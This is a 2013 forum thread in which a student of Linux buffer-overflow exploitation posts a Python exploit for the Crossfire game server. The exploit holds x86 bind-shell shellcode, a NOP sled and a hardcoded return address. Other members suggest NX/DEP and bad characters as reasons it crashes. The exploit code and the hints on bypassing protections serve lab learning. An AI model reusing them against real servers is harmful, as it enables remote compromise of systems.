.

Linux Memory Protection

<<

zaixer

User avatar

Newbie
Newbie

Posts: 9

Joined: Thu Jun 13, 2013 12:33 pm

Post Tue Jul 02, 2013 2:37 pm

Linux Memory Protection

Hi all,

I am practicing linux bof exploitation. when trying to exploit a vulnerability in crossfire, everything works well and I get the shellcode placed in the right place, and the program flow gets redirected to shellcode, however, when start executing the shell code, the program fails.

OS version (bt5 R3):
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux

exploit code:
#!/usr/bin/python
import socket, sys
host = sys.argv[1]

#0x8134e77 jump eax
#0xb7dadad6 nop sled address



shellcode= ("\xcc\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80")


crash = "\x90" *199 + shellcode + "\x43" * 4090 + "\xd6\xda\xda\xb7" + "D" * 7



buffer= "\x11(setup sound " + crash + "\x90\x00#"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host, 13327))
print (s.recv(1024))

s.send(buffer)
s.close()
print "[*]Payload Sent !"
====================================================================================================================

I placed a break point before the shellcode and the execution flow hits it successfully, however, after continuing the program crashes and gives the following message:

"Program received signal SIGSEGV, Segmentation fault.
0xb7daeb36 in ?? ()"

when inspecting this address, it's full of zeros !

I already disabled ASLR before starting the exercise and I am wondering does any other protection mechanism exist that prevents exploitation ?
<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Mon Jul 08, 2013 2:36 pm

Re: Linux Memory Protection

DEP? Maybe try an older Distro like Ubuntu 7.04.

Also, have you filtered out bad characters? Does your shellcode arrive completely in tact?
The day you stop learning is the day you start becoming obsolete.
<<

m0wgli

User avatar

Sr. Member
Sr. Member

Posts: 308

Joined: Fri Jul 20, 2012 3:34 pm

Post Mon Jul 08, 2013 4:52 pm

Re: Linux Memory Protection

zaixer wrote:I already disabled ASLR before starting the exercise and I am wondering does any other protection mechanism exist that prevents exploitation ?


Are you doing the Offensive security - Penetration Testing with BackTrack (PWB) course?
Security + | OSWP | eCPPT (Silver & Gold) | CSTA
<<

zaixer

User avatar

Newbie
Newbie

Posts: 9

Joined: Thu Jun 13, 2013 12:33 pm

Post Fri Jul 12, 2013 9:51 pm

Re: Linux Memory Protection

I think DEP is windows based and NX is linux based...correct me please if I am wrong. the point is not to make it work only. its about understanding why it did not work :). I do not like leaving it just because it did not work :)
<<

testdotphp

User avatar

Newbie
Newbie

Posts: 6

Joined: Tue Jul 02, 2013 7:39 am

Post Mon Jul 15, 2013 8:45 am

Re: Linux Memory Protection

zaixer wrote:I think DEP is windows based and NX is linux based...correct me please if I am wrong.


DEP is not Windows only and is even supported by phone OSes like iOS and Android.
Also, the "never execute bit" is part of the CPU and is supported by quite a few operating systems now. The never execute bit was a large part of the MS08-067 "thing", as well.

Return to Programming

Who is online

Users browsing this forum: No registered users and 1 guest

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software